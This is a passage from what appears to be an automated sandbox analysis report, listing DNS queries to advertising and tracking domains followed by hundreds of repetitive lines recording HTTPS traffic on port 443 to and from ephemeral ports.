    Source: global trafficDNS traffic detected: DNS query: fw.adsafeprotected.com
    Source: global trafficDNS traffic detected: DNS query: ssum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: i.liadm.com
    Source: global trafficDNS traffic detected: DNS query: ads.stickyadstv.com
    Source: global trafficDNS traffic detected: DNS query: s.company-target.com
    Source: global trafficDNS traffic detected: DNS query: b1sync.zemanta.com
    Source: global trafficDNS traffic detected: DNS query: cms.quantserve.com
    Source: global trafficDNS traffic detected: DNS query: js-sec.indexww.com
    Source: global trafficDNS traffic detected: DNS query: s0.2mdn.net
    Source: global trafficDNS traffic detected: DNS query: d.turn.com
    Source: global trafficDNS traffic detected: DNS query: thrtle.com
    Source: global trafficDNS traffic detected: DNS query: 1f2e7.v.fwmrm.net
    Source: global trafficDNS traffic detected: DNS query: sync.srv.stackadapt.com
    Source: global trafficDNS traffic detected: DNS query: rtb.adentifi.com
    Source: global trafficDNS traffic detected: DNS query: pr-bh.ybp.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: match.prod.bidr.io
    Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
    Source: global trafficDNS traffic detected: DNS query: pm.w55c.net
    Source: global trafficDNS traffic detected: DNS query: prod-cdn.wetransfer.net
    Source: global trafficDNS traffic detected: DNS query: image8.pubmatic.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50303 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
    Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
    Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
    Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
    Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
    Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
    Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
    Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
    Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
